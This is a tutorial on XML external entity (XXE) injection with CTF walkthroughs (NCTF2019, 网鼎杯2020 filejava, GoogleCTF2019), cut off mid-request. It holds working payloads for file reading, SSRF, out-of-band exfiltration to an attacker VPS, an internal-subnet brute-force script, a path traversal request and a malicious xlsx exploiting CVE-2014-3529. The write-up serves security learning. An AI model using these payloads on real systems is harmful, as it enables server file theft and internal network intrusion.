What is XML external entity injection?

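XML external entity injection (XXE) occurs when a web application processes an XML document that can contain XML entities whose URIs resolve to documents outside the intended sphere of control, causing the application to embed the wrong documents in its output.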

Since this is about XML, the first step is a rough grasp of XML syntax. The following two articles are worth reading:

WebGoat8.22之XML External Entities (reference: WebGoat-XXE)

XML外部实体注入详解 (reference: XXE details)

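Second, to understand the vulnerability in more depth, I want to fill in some development background. Consider the challenges web servers faced at the time: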

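Display only: HTML is mainly meant for browser rendering and cannot serve as a standard format for exchanging data between systems.
Poor cross-platform compatibility: the structure and content of an HTML document are hard for non-browser programs to parse and use directly.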

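This is largely why XML was created, and it is also why XML focuses on the data itself and on how that data is structured and transmitted. XML's main goals are therefore: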

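Better interoperability: with a standardized data format, different systems can exchange information more easily.
Simpler data sharing: XML allows custom tags, which makes it well suited to sharing data between different applications.
Better readability and maintainability: XML files may be larger than binary formats, but the text format is easy for humans to read and write.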

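In this respect XML resembles JSON, the lighter and more modern format that has largely replaced it for data exchange. A server that speaks JSON may therefore still be exposed to XXE: you can never be sure whether an endpoint that accepts JSON once supported XML and still does.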

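In some cases an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure by using the XXE vulnerability to perform server-side request forgery (SSRF).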

How to exploit XXE

Exploiting XXE to retrieve files

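To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, modify the submitted XML by introducing (or editing) a DOCTYPE element that defines an external entity containing the path to the file, and reference that entity in a data value that the application returns.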

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

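With real-world XXE vulnerabilities, the submitted XML often contains many data values, any of which might be used in the application's response. To test for XXE systematically, you generally need to test each data node in the XML individually, by using your defined entity in it and checking whether the entity's value appears in the response.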
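
The node-by-node testing described above can be sketched in Python. This is a minimal illustration, not a complete scanner: the function name `probe_variants`, the marker string, and the `storeId` element in the usage note are hypothetical, and the sketch uses a harmless internal entity so that it only checks whether entity values are reflected.

```python
import copy
import xml.etree.ElementTree as ET

PLACEHOLDER = "__PROBE__"  # temporary token, swapped for the entity reference after serialization


def probe_variants(xml_body, marker="xxe-probe-7f3a"):
    """Return (tag, document) pairs, one per leaf node, each using &probe; in that node."""
    root = ET.fromstring(xml_body)
    leaf_count = sum(1 for element in root.iter() if len(element) == 0)
    variants = []
    for index in range(leaf_count):
        clone = copy.deepcopy(root)
        target = [element for element in clone.iter() if len(element) == 0][index]
        target.text = PLACEHOLDER
        # ElementTree would escape "&", so the reference is inserted as plain text afterwards.
        body = ET.tostring(clone, encoding="unicode").replace(PLACEHOLDER, "&probe;")
        doctype = f'<!DOCTYPE {clone.tag} [ <!ENTITY probe "{marker}"> ]>'
        document = '<?xml version="1.0" encoding="UTF-8"?>\n' + doctype + "\n" + body
        variants.append((target.tag, document))
    return variants
```

Calling `probe_variants("<stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>")` yields two documents. If the marker shows up in the response to one of them, that node is a candidate for the external-entity payload.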

Exploiting XXE to perform SSRF attacks

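Besides file, XML parsers may support other URI schemes such as http, https, gopher, dict, and php://filter (for example php://filter/convert.base64-encode/resource=), depending on the parser and platform. Of these, http, https, gopher, and dict are well suited to SSRF attacks.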

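Of course, if your goal is to discover live hosts on the internal network, you need to read files such as /etc/hosts, /proc/net/arp, and /proc/net/fib_trie. That calls for a scheme that can read local files on the server, such as file or php://filter.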

/proc/net/fib_trie is a Linux file that exposes the kernel's FIB (Forwarding Information Base) routing table as a prefix tree (trie). The FIB is the core data structure the kernel uses to decide how IP packets are forwarded.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal-network"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

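Blind XXE vulnerabilities

Many XXE vulnerabilities are blind: the web application does not return the value of any defined external entity in its responses, so server-side files cannot be retrieved directly.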

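We can still use out-of-band (OOB) techniques to find such vulnerabilities and exploit them to exfiltrate data. Sometimes an XML parsing error can also be triggered so that sensitive data leaks in the error message.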

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://your-VPS-public-IP-address:port/file.dtd">
%remote;%int;%send;
]>

The external file.dtd contains:

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://your-VPS-public-IP-address:other-port?p=%file;'>">
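
The order of evaluation is: %remote; loads the external DTD, %int; declares the send entity with the file contents already substituted into its URL, and %send; makes the outbound request. A small Python helper can render the DTD for a given target and listener. This is only a sketch; the function name `build_oob_dtd` and the address in the usage note are illustrative assumptions.

```python
def build_oob_dtd(target_uri: str, exfil_url: str) -> str:
    """Render an external DTD that reads target_uri and appends it to exfil_url as ?p=..."""
    return (
        # Parameter entity holding the contents of the target resource.
        f'<!ENTITY % file SYSTEM "{target_uri}">\n'
        # &#37; is an escaped "%", so "send" is only declared when %int; is expanded.
        f"<!ENTITY % int \"<!ENTITY &#37; send SYSTEM '{exfil_url}?p=%file;'>\">\n"
    )
```

For example, `build_oob_dtd("file:///flag", "http://203.0.113.10:9999")` produces the same two declarations as the file.dtd above, with the placeholder host and port filled in.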

Finding hidden attack surface for XXE injection

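In many cases the attack surface for XXE injection is obvious, because the application's normal HTTP traffic includes requests that contain XML data. In other cases it is less visible. If you look in the right places and in the right way, however, you will find XXE attack surface in requests that do not contain any XML.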

XInclude attacks

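Some applications receive client-submitted data, embed it into an XML document on the server side, and then parse the document. For example, client-submitted data may be placed into a backend SOAP request that is then processed by the backend SOAP service.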

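In this situation you cannot carry out a classic XXE attack, because you do not control the whole XML document and so cannot define or modify a DOCTYPE element. You may be able to use XInclude instead. XInclude is a W3C specification in the XML family that allows an XML document to be built from sub-documents. An XInclude attack can be placed inside any data value in an XML document, so it works even when you control only a single data item that is placed into a server-side XML document.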

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
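
To see what an XInclude-aware processor does with such a value, the following sketch resolves an xi:include against a temporary local file using Python's standard library. It is a local demonstration under stated assumptions: `resolve_xinclude` and `demo` are hypothetical names, and `xml.etree.ElementInclude` expects a plain file path in `href` rather than a file:// URL, so the href differs from the payload above.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def resolve_xinclude(document: str) -> str:
    """Parse the document, expand xi:include elements in place, and return the root's text."""
    root = ET.fromstring(document)
    ElementInclude.include(root)
    return root.text or ""


def demo() -> str:
    """Include a throwaway file through the single data value an attacker would control."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False, encoding="utf-8") as handle:
        handle.write("local-secret")
        path = handle.name
    try:
        document = (
            '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include parse="text" href="{path}"/></foo>'
        )
        return resolve_xinclude(document)
    finally:
        os.remove(path)
```

The call `demo()` returns the file's contents, which shows why a server that runs XInclude processing on attacker-influenced XML can leak local files without any DOCTYPE.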

XXE attacks via file upload

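Some applications let users upload files that are then processed on the server side. Several common file formats use XML or contain XML subcomponents. Examples of XML-based formats include office document formats such as DOCX and XLSX, and image formats such as SVG.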

Note that an application may still accept and process these XML-based formats even when they are not among the formats it expects to receive.

XXE attacks via modified content type

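As noted in the introduction, XML is all about structuring and transporting data. It is therefore worth changing the request's Content-Type to text/xml or application/xml, re-encoding the body as XML, and observing how the server behaves.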
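
Re-encoding a flat JSON body as XML for this test can be sketched as follows. The function name `flat_json_to_xml` and its `root_tag` parameter are assumptions made for illustration, and the sketch only handles flat objects whose keys are valid XML element names.

```python
from typing import Optional
from xml.sax.saxutils import escape


def flat_json_to_xml(fields: dict, root_tag: Optional[str] = None) -> str:
    """Re-encode a flat JSON object as an XML body, escaping the text values."""
    parts = [f"<{key}>{escape(str(value))}</{key}>" for key, value in fields.items()]
    if root_tag is None:
        # Without a wrapper element, exactly one field is needed for a single-rooted document.
        if len(parts) != 1:
            raise ValueError("pass root_tag when the object has more than one field")
        body = parts[0]
    else:
        body = f"<{root_tag}>" + "".join(parts) + f"</{root_tag}>"
    return '<?xml version="1.0" encoding="UTF-8"?>' + body
```

For instance, `flat_json_to_xml({"message": "hello"})` gives `<?xml version="1.0" encoding="UTF-8"?><message>hello</message>`, which would be sent with the Content-Type header set to application/xml.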

Exploiting XXE to retrieve data by repurposing a local DTD

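Sometimes the target uses a WAF to block OOB XXE, so we cannot load a malicious external .dtd file. We can, however, try a DTD that already exists on the server's local filesystem.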

Linux:

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;

Windows:

<!ENTITY % local_dtd SYSTEM "file:///C:/Windows/System32/wbem/xml/cim20.dtd">
<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

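In this situation the usual approach is the error-based leak from blind XXE. For example, referencing a nonexistent path leaks sensitive data through the error message: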

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ELEMENT message (#PCDATA)>
  <!ENTITY id "135601360123502401401250">
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa '
    <!ENTITY &#x0025; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x0025; eval "<!ENTITY &#x0026;#x0025; error SYSTEM &#x0027;file:///fakepath/&#x0025;file;&#x0027;>">
  &#x0025;eval;&#x0025;error;
  '>
  %local_dtd;
]>
<message>&id;</message>

Some Examples In CTF Contest

This section shows some XXE exploitation techniques, mainly through CTF challenges.

BUUCTF | NCTF2019-Fake XML cookbook

Capture the request that the page sends:

Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
Origin: http://00c243b4-c434-4ea6-b0d8-125c18cd37ce.node5.buuoj.cn:81
Referer: http://00c243b4-c434-4ea6-b0d8-125c18cd37ce.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

<user><username>administrator</username><password>aaaaaaa</password></user>

The body is structured and looks like XML. Opening the page source with F12 leads to the following snippet:

function doLogin(){
  var username = $("#username").val();
  var password = $("#password").val();
  if(username == "" || password == ""){
    alert("Please enter the username and password!");
    return;
  }

  var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
          var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
          var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
          if(code == "0"){
            $(".msg").text(msg + " login fail!");
          }else if(code == "1"){
            $(".msg").text(msg + " login success!");
          }else{
            $(".msg").text("error:" + msg);
          }
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}

doLogin() uses jQuery's $.ajax to send the entered username and password as XML to the backend endpoint doLogin.php, and shows the login status based on the XML it gets back.

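The response shows that the backend runs PHP. If PHP handles the submitted XML with DOMDocument::loadXML() or another XML parser and external entity resolution is not disabled, an attacker can submit crafted XML to this endpoint and read arbitrary files on the server.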

So we gamble 😋 that the target's security configuration is flawed, and use <!DOCTYPE xxx [<!ENTITY foo SYSTEM "file:///xxx">]> to try to read an arbitrary file:

As the screenshot shows, the attempt succeeds and we get the flag. That completes the simplest kind of XXE attack.

BUUCTF | NCTF2019-True XML cookbook

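This challenge is the advanced version of the previous one. First, the same payload no longer works; it returns "failed to open stream: operation failed in /var/www/html/doLogin.php". Either we lack permission, or the /flag file is simply not on this machine.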

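Second, the target appears to have no outbound internet access: using the http scheme to reach my own VPS returned 504 timeout. The next step is to dig through the contents of doLogin.php.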

<?php
   /**
    * autor: c0ny1
    * date: 2018-2-7
    */

    $USERNAME = 'admin';
    $PASSWORD = '024b87931a03f738fff6693ce0a78c88';
    $result = null;

    libxml_disable_entity_loader(false);
    $xmlfile = file_get_contents('php://input');

    try{
      $dom = new DOMDocument();
      $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
      $creds = simplexml_import_dom($dom);

      $username = $creds->username;
      $password = $creds->password;

      if($username == $USERNAME && $password == $PASSWORD){
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
      }else{
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
      }
    }catch(Exception $e){
      $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
    }

    header('Content-Type: text/html; charset=utf-8');
    echo $result;
?>

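There is no protection at all, so it is more likely that /flag is not on the vulnerable machine and most probably sits on another server in the internal network. We can use the http scheme for SSRF to check. Before that we need to determine the internal subnet, and /proc/net/fib_trie is the more reliable source.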
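
Picking the host's own addresses out of a fib_trie dump can be sketched like this. The sample text is a simplified, made-up excerpt in the file's usual layout (including the address 10.244.244.17), not output from the challenge, and `local_addresses` is a hypothetical helper name.

```python
import ipaddress

# Simplified, illustrative excerpt; real files are longer and list several tables.
SAMPLE = """\
Main:
  +-- 10.244.244.0/24 2 0 2
     |-- 10.244.244.0
        /24 link UNICAST
     |-- 10.244.244.17
        /32 host LOCAL
     |-- 10.244.244.255
        /32 link BROADCAST
Local:
  +-- 127.0.0.0/8 2 0 2
     |-- 127.0.0.1
        /32 host LOCAL
"""


def local_addresses(fib_trie_text):
    """Return non-loopback addresses that the trie marks as 'host LOCAL'."""
    found = []
    current = None
    for raw_line in fib_trie_text.splitlines():
        line = raw_line.strip()
        if line.startswith("|--"):
            # A leaf line carries the address that the following route lines describe.
            current = line[3:].strip()
        elif line.endswith("host LOCAL") and current:
            if not ipaddress.ip_address(current).is_loopback and current not in found:
                found.append(current)
    return found
```

Here `local_addresses(SAMPLE)` returns the one non-loopback local address, and the enclosing prefix line above it (10.244.244.0/24 in the sample) gives the subnet to scan.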

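The internal subnet is easy to identify as roughly 10.244.244.0/24 (strictly speaking, it falls within 10.0.0.0/8). Then either use Burp Suite's Intruder or write a brute-force script with the Python requests module. Intruder can be a bit slow unless its delay settings are tuned. For this challenge neither approach has a real advantage.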

import requests
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
import threading

# Initialize colorama (for colored terminal output)
init(autoreset=True)

# Target URL and payload template
url = "http://b6dfe23d-62b7-4d72-abda-e234bce9a24d.node5.buuoj.cn:81/doLogin.php"

payload_template = '''
<!DOCTYPE user [
<!ENTITY foo SYSTEM "http://10.244.244.{ip_suffix}">
]>
<user>
    <username>&foo;</username>
    <password>aaaaaaaaaa</password>
</user>
'''

# Request headers (mimic the browser's request)
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36",
    "Content-Type": "application/xml;charset=UTF-8",
}

# An event to signal all threads to stop
stop_event = threading.Event()

def find_flag(ip_suffix):
    """
    Sends a request for a given IP suffix and checks for the flag.
    Returns the flag if found, otherwise None.
    """
    if stop_event.is_set():
        return None

    payload = payload_template.format(ip_suffix=ip_suffix)

    try:
        response = requests.post(
            url,
            data=payload,
            headers=headers,
            timeout=3
        )

        if "flag{" in response.text:
            flag = response.text.strip()
            print(f"{Fore.GREEN}[+] Flag found from IP suffix {ip_suffix}: {flag}{Style.RESET_ALL}")
            stop_event.set()
            return flag

    except requests.exceptions.RequestException:
        # Ignore connection errors and timeouts to keep the output clean.
        pass
    except Exception as e:
        if not stop_event.is_set():
            print(f"{Fore.RED}[-] Unexpected error on {ip_suffix}: {str(e)}{Style.RESET_ALL}")

    return None

def main():
    MAX_THREADS = 10
    flag_found = None

    print(f"Starting scan with {MAX_THREADS} threads...")

    with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        futures = {executor.submit(find_flag, i) for i in range(1, 256)}

        for future in as_completed(futures):
            result = future.result()
            if result:
                flag_found = result
                # Shutdown the executor immediately, don't wait for other running tasks
                executor.shutdown(wait=False, cancel_futures=True)
                break

    if flag_found:
        print(f"\n{Fore.GREEN}>>> Scan finished. The flag is: {flag_found}{Style.RESET_ALL}")
    else:
        print(f"\n{Fore.YELLOW}>>> Scan completed, but no flag was found.{Style.RESET_ALL}")

if __name__ == "__main__":
    main()

Results may differ from one instance to another; I got the flag from 10.244.244.216.

NSSCTF | 网鼎杯2020青龙组-filejava

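Fingerprinting shows the target uses Java and OpenResty. The application is a simple file upload feature that offers a download link after upload; in short, it looks like a file storage or image hosting service.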

Testing the access control of the download service reveals a flaw: path traversal.

GET /DownloadServlet?filename=../ HTTP/1.1
Host: 1bcd82f2-2308-43db-8714-b12e359a2ab8.node5.buuoj.cn:81
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Connection: close
Cache-Control: max-age=0

Sending this request makes the server return an error like "/usr/local/tomcat/webapps/ROOT/WEB-INF/upload/15/6/.. (Is a directory)", which directly reveals that the stack uses Tomcat and how the paths are laid out.
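
For contrast, the check that the download endpoint appears to be missing can be sketched as below. The target is a Java servlet, so this Python version is only an illustration of the idea; `resolve_download` is a hypothetical name, not code from the challenge.

```python
import os


def resolve_download(base_dir: str, filename: str) -> str:
    """Resolve filename inside base_dir and refuse anything that escapes it."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # After normalization the requested path must still sit strictly below the upload directory.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"refusing path outside upload directory: {filename!r}")
    return candidate
```

With such a check in place, a request for `../` or `../../conf/server.xml` would be rejected before any file is opened.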

Based on this, try to read the sensitive file /usr/local/tomcat/conf/server.xml:

<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements.  See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License.  You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- Note:  A "Server" is not itself a "Container", so you may not
define subcomponents such as "Valves" at this level.
Documentation at /docs/config/server.html
-->
<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.startup.VersionLoggerListener" />
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="org.apache.catalina.security.SecurityListener" />
  -->
  <!--APR library loader. Documentation at /docs/apr.html -->
  <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on" />
  <!-- Prevent memory leaks due to use of particular java/javax APIs-->
  <Listener className="org.apache.catalina.core.JreMemoryLeakPreventionListener" />
  <Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" />
  <Listener className="org.apache.catalina.core.ThreadLocalLeakPreventionListener" />

  <!-- Global JNDI resources
  Documentation at /docs/jndi-resources-howto.html
  -->
  <GlobalNamingResources>
    <!-- Editable user database that can also be used by
    UserDatabaseRealm to authenticate users
    -->
    <Resource name="UserDatabase" auth="Container"
      type="org.apache.catalina.UserDatabase"
      description="User database that can be updated and saved"
      factory="org.apache.catalina.users.MemoryUserDatabaseFactory"
      pathname="conf/tomcat-users.xml" />
  </GlobalNamingResources>

  <!-- A "Service" is a collection of one or more "Connectors" that share
  a single "Container" Note:  A "Service" is not itself a "Container",
  so you may not define subcomponents such as "Valves" at this level.
  Documentation at /docs/config/service.html
  -->
  <Service name="Catalina">

    <!--The connectors can use a shared executor, you can define one or more named thread pools-->
    <!--
    <Executor name="tomcatThreadPool" namePrefix="catalina-exec-"
    maxThreads="150" minSpareThreads="4"/>
    -->


    <!-- A "Connector" represents an endpoint by which requests are received
    and responses are returned. Documentation at :
    Java HTTP Connector: /docs/config/http.html
    Java AJP  Connector: /docs/config/ajp.html
    APR (HTTP/AJP) Connector: /docs/apr.html
    Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool-->
    <!--
    <Connector executor="tomcatThreadPool"
               port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    -->
    <!-- Define an SSL/TLS HTTP/1.1 Connector on port 8443
         This connector uses the NIO implementation. The default
         SSLImplementation will depend on the presence of the APR/native
         library and the useOpenSSL attribute of the
         AprLifecycleListener.
         Either JSSE or OpenSSL style configuration may be used regardless of
         the SSLImplementation selected. JSSE style configuration is used below.
    -->
    <!--
    <Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
               maxThreads="150" SSLEnabled="true">
        <SSLHostConfig>
            <Certificate certificateKeystoreFile="conf/localhost-rsa.jks"
                         type="RSA" />
        </SSLHostConfig>
    </Connector>
    -->
    <!-- Define an SSL/TLS HTTP/1.1 Connector on port 8443 with HTTP/2
         This connector uses the APR/native implementation which always uses
         OpenSSL for TLS.
         Either JSSE or OpenSSL style configuration may be used. OpenSSL style
         configuration is used below.
    -->
    <!--
    <Connector port="8443" protocol="org.apache.coyote.http11.Http11AprProtocol"
               maxThreads="150" SSLEnabled="true" >
        <UpgradeProtocol className="org.apache.coyote.http2.Http2Protocol" />
        <SSLHostConfig>
            <Certificate certificateKeyFile="conf/localhost-rsa-key.pem"
                         certificateFile="conf/localhost-rsa-cert.pem"
                         certificateChainFile="conf/localhost-rsa-chain.pem"
                         type="RSA" />
        </SSLHostConfig>
    </Connector>
    -->

    <!-- Define an AJP 1.3 Connector on port 8009 -->
    <!--
    <Connector protocol="AJP/1.3"
               address="::1"
               port="8009"
               redirectPort="8443" />
    -->

    <!-- An Engine represents the entry point (within Catalina) that processes
         every request.  The Engine implementation for Tomcat stand alone
         analyzes the HTTP headers included with the request, and passes them
         on to the appropriate Host (virtual host).
         Documentation at /docs/config/engine.html -->

    <!-- You should set jvmRoute to support load-balancing via AJP ie :
    <Engine name="Catalina" defaultHost="localhost" jvmRoute="jvm1">
    -->
    <Engine name="Catalina" defaultHost="localhost">

      <!--For clustering, please take a look at documentation at:
          /docs/cluster-howto.html  (simple how to)
          /docs/config/cluster.html (reference documentation) -->
      <!--
      <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"/>
      -->

      <!-- Use the LockOutRealm to prevent attempts to guess user passwords
           via a brute-force attack -->
      <Realm className="org.apache.catalina.realm.LockOutRealm">
        <!-- This Realm uses the UserDatabase configured in the global JNDI
             resources under the key "UserDatabase".  Any edits
             that are performed against this UserDatabase are immediately
             available for use by the Realm.  -->
        <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
               resourceName="UserDatabase"/>
      </Realm>

      <Host name="localhost"  appBase="webapps"
            unpackWARs="true" autoDeploy="true">

        <!-- SingleSignOn valve, share authentication between web applications
             Documentation at: /docs/config/valve.html -->
        <!--
        <Valve className="org.apache.catalina.authenticator.SingleSignOn" />
        -->

        <!-- Access log processes all example.
             Documentation at: /docs/config/valve.html
             Note: The pattern used is equivalent to using pattern="common" -->
        <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs"
               prefix="localhost_access_log" suffix=".txt"
               pattern="%h %l %u %t &quot;%r&quot; %s %b" />

      </Host>
    </Engine>
  </Service>
</Server>

Reading the sensitive file /usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml:

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>

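From these two files we learn which ports Tomcat listens on and which servlets it serves. We can abuse the broken access control to download the .class bytecode files under webapps/ROOT/WEB-INF/classes/cn/abc/servlet/, decompile them to Java source, and audit the code. I opened the .class files directly in IDEA; you can also decompile them with JD-GUI.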

First, some version information stands out immediately:

System.err.println("poi-ooxml-3.10 has something wrong");

Searching for this string leads to a known n-day, CVE-2014-3529. The code in this challenge that triggers the CVE:

if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException e) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        e.printStackTrace();
    }
}

So uploading a file named excel-xxx.xlsx triggers it. An .xlsx or .docx file is essentially a ZIP archive with XML files inside once extracted, so we can tamper with one of those XML files, here [Content_Types].xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://your-VPS-public-IP-address:port/file.dtd">
%remote;%int;%send;
]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-officedocument.custom-properties+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/worksheets/sheet2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/worksheets/sheet3.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>

The external file.dtd hosted on the VPS contains:

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://your-VPS-public-IP-address:other-port?p=%file;'>">
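
Repacking the workbook with the modified [Content_Types].xml can be done by hand with any ZIP tool, or sketched in Python with the standard zipfile module. The helper name `inject_doctype` is an assumption for illustration; it copies every archive member unchanged except [Content_Types].xml, where it places the given DOCTYPE right after the XML declaration.

```python
import io
import zipfile

CONTENT_TYPES = "[Content_Types].xml"


def inject_doctype(xlsx_bytes: bytes, doctype: str) -> bytes:
    """Return a copy of the archive with doctype inserted into [Content_Types].xml."""
    source = zipfile.ZipFile(io.BytesIO(xlsx_bytes))
    output = io.BytesIO()
    with source, zipfile.ZipFile(output, "w", zipfile.ZIP_DEFLATED) as target:
        for item in source.infolist():
            data = source.read(item.filename)
            if item.filename == CONTENT_TYPES:
                text = data.decode("utf-8-sig")
                # Keep the XML declaration first; the DOCTYPE has to follow it.
                decl_end = text.find("?>") + 2 if text.startswith("<?xml") else 0
                text = text[:decl_end] + "\n" + doctype + "\n" + text[decl_end:]
                data = text.encode("utf-8")
            target.writestr(item.filename, data)
    return output.getvalue()
```

The returned bytes would then be saved under a name such as excel-xxx.xlsx so that the upload handler passes them to WorkbookFactory.create.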

Then listen with the following commands:

python3 -m http.server port &
nc -lvnp other-port

BUUCTF | GoogleCTF2019-Quals-Bnv

Start by capturing a request:

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/json
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"message":"135601360123502401401250"}

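The service looks like some kind of search, and the data is sent as JSON. Given the relationship between JSON and XML, and the lack of any other attack surface so far (directories, APIs, backend, middleware), we try changing the value of the Content-type header.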

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 38
